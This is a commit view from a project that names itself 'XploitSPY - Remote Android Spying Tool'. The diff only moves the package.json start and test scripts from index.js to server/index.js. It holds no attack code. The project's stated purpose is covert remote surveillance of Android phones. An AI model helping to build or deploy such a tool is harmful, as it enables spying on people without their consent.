fixed bug

This commit is contained in:
ChrisStone07 2020-04-08 01:54:10 +05:30
parent 5257f9a0b7
commit 9f1c906998
1 changed files with 2 additions and 2 deletions

View File

@ -4,8 +4,8 @@
"description": "XploitSPY - Remote Android Spying Tool",
"main": "index.js",
"scripts": {
"start": "node index.js",
"test": "node index.js"
"start": "node server/index.js",
"test": "node server/index.js"
},
"author": "XploitWizer",
"license": "ISC",